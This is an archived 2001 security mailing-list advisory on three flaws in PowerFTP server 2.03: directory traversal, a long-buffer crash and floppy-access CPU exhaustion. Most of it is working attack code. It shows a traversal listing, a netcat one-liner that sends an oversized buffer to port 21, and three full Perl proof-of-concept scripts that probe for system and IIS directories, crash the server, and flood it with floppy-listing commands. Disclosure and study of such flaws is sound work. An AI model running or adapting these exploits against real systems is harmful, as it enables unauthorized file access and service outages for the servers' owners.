[EXPL] PowerFTP Directory Traversal and DoS Vulnerabilities
From: support@securiteam.comDate: 11/30/01
- Previous message: support@securiteam.com: "[UNIX] Xitami Admin Password Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Subject: [EXPL] PowerFTP Directory Traversal and DoS Vulnerabilities Message-Id: <20011130083657.33C84138BF@mail.der-keiler.de> Date: Fri, 30 Nov 2001 09:36:57 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
PowerFTP Directory Traversal and DoS Vulnerabilities
------------------------------------------------------------------------
SUMMARY
<http://www.cooolsoft.com/powerftp.htm> PowerFTP is a powerful FTP
client/server software. Three security vulnerabilities have been found in
the product - one allows access to files that reside outside the chained
FTP root directory, another to cause the product to crash by sending it a
long buffer, and the last one to utilize all available CPU by accessing
the floppy drive.
DETAILS
Vulnerable systems:
PowerFTP version 2.03
Directory Traversal:
Example:
ftp> ls ../../../../../../../
200 Port command successful.
150 Opening data connection for directory list.
SUHDLOG.DAT
COMMAND.COM
BOOTLOG.PRV
FRUNLOG.TXT
DOS
AUTOEXEC.DOS
CONFIG.DOS
VIDEOROM.BIN
CONFIG.SYS
DBLSPACE.BIN
MSDOS.SYS
MSDOS.---
SETUPLOG.TXT
WINDOWS
test.txt.txt
Exploit:
#!/usr/bin/perl
# Simple script to view the files from the ftp server,
# even if they are outside of root directory.
#
# This script assume OS WinNT/2k/W.x and it looked
# for directories of IIS.
#
# PowerFTP Server v2.03 proof-of-concept exploit
# By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
#
#
# Usage: perl -x PowerFTP_data.pl -s <server>
#
# Examples:
#
# perl -x PowerFTP_data.pl -s 10.0.0.1 -l temp -p temp
# perl -x PowerFTP_data.pl -s 10.0.0.1
#
use Getopt::Std;
use IO::Socket;
print("\nPowerFTP server v2.03 Data revealing exploit (c)2001\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");
getopts('s:l:p:',\%args);
my ($CRLF,$port,$login,$pass,$win,$iis,@drives,$dir,$sock_res);
$CRLF = "\015\012";
@drives = ("c","d","e"); #Possible drives remotes
# If u needed read the drive A floopy add this line
# @drives = ("a","c","d","e","f".......etc,etc
$port = 21;
$login = 'temp'; #Maybe u needed to change this
$pass = 'temp'; #Maybe u needed to change this
if (defined $args{s}) { $host = $args{s}; } else
{ print "No host specified.\n";
print "Usage: $0 -s <server> -l <user> -p <pass>\n\n";exit;
}
if (defined $args{l}) { $login = $args{l}; }
if (defined $args{p}) { $pass = $args{p}; }
$sock =
IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host,PeerPort=>$port) ||
die("Socket errors: $!");
$sock_res = <$sock>;
print $sock "USER $login" . $CRLF;
$sock_res = <$sock>;
print $sock "PASS $pass" . $CRLF;
$sock_res = <$sock>;
if ($sock_res !~ /230\s/) { print "Login/password not
accepted...exiting.\n"; close($sock); exit; }
print $sock "PWD" . $CRLF;
$sock_res = <$sock>;
print "Attempting to locate system files...";
$win = &OS;
$iis = &IIS;
print "done..\n\n"; close($sock);
print "Windows directory: $win\n";
print "IIS dorectory: $iis\n";
print "Try manually on FTPserver $host: dir c:/\n\n";
exit;
sub OS {
my @win_dirs = ("win","windows","winnt","winme");
foreach $drive (@drives)
{
foreach $dir (@win_dirs)
{
print ".";
print $sock "NLST $drive:/$dir/" . $CRLF;
$sock_res = <$sock>;
if ($sock_res =~ /213\s/)
{return("$drive:\\$dir");}
}
}
return("not found");
}
sub IIS {
my @iis_files = ("Inetpub/wwwroot/", "Inetpub/wwwroot/cgi-bin/");
foreach $drive (@drives)
{
foreach $file (@iis_files)
{
print ".";
print $sock "NLST $drive:/$file" . $CRLF;
$sock_res = <$sock>;
if ($sock_res =~ /213\s/) {
$file =~ s/\//\\/g;
return("$drive:\\$file");
}
}
}
return("not found");
}
Denial of Service:
Example:
# perl -e ' for ($i=1;$i<2049;$i++) { print "A";} ' | nc 10.0.0.1 21
220 Personal FTP Server ready
The server will then crash causing a denial of service attack.
Exploit:
#!/usr/bin/perl
# Simple script to send a long 'A^s' command to the server,
# resulting in the ftpd crashing
#
# PowerFTP Server v2.03 proof-of-concept exploit
# By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
#
#
# Usage: perl -x PowerFTP_Dos.pl -s <server>
#
# Example:
#
# perl -x PowerFTP_Dos.pl -s 10.0.0.1
# 220 Personal FTP Server ready
# Crash was successful !
#
use Getopt::Std;
use IO::Socket;
print("\nPowerFTP server v2.03 DoS exploit (c)2001\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");
getopts('s:', \%args);
if(!defined($args{s})){&usage;}
$serv = $args{s};
$foo = "A"; $number = 2048;
$data .= $foo x $number; $EOL="\015\012";
$remote = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $args{s},
PeerPort => "ftp(21)",
) || die("Unable to connect to ftp port at $args{s}\n");
$remote->autoflush(1);
print $remote "$data". $EOL;
while (<$remote>){ print }
print("\nCrash was successful !\n");
sub usage {die("\nUsage: $0 -s <server>\n\n");}
Exploit: (DoS attack via floppy)
#!/usr/bin/perl
#
# Even though the server will deny access, the slow hardware
# will still hang the machine. This program attempts to
# exploit this weakness by sending the 'NLST a:/' command to
# the server
#
# PowerFTP Server v2.03 proof-of-concept exploit
# By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
#
#
# Usage: perl -x PowerFTP_floppy.pl <server> <port> <user> <pass>
#
# Example:
#
# perl -x PowerFTP_floppy.pl 10.0.0.1 21 temp temp
#
use IO::Socket;
print("\nPowerFTP server v2.03 DoS exploit Floppy (c)2001\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");
#$NUMBER_TO_SEND = 3000;
$BUFF = 3000;
if ( scalar @ARGV < 4 ) {
print "Usage: $0 <server> <port> <user> <pass>\n";
exit();
}
$target = $ARGV[ 0 ];
$port = $ARGV[ 1 ];
$username = $ARGV[ 2 ];
$password = $ARGV[ 3 ];
print "Creating socket... ";
$sock = new IO::Socket::INET( PeerAddr => $target,
PeerPort => int( $port ),
Proto => 'tcp' );
die "$!" unless $sock;
print "done.\n";
read( $sock, $buffer, 1 );
print "Sending username...";
print $sock "USER " . $username . "\n";
read( $sock, $buffer, 1 );
print "done.\n";
print "Sending password...";
print $sock "PASS " . $password . "\n";
read( $sock, $buffer, 1 );
print "done.\n";
print "DoS Attack floppy server...";
for( $i = 0; $i < $BUFF; $i++ ) {
print $sock "NLST a:/\n";
read( $sock, $buffer, 1 );
}
print "done.\n";
close( $sock );
exit();
ADDITIONAL INFORMATION
The information has been provided by <mailto:al3xhernandez@ureach.com>
al3x hernandez.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[UNIX] Xitami Admin Password Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
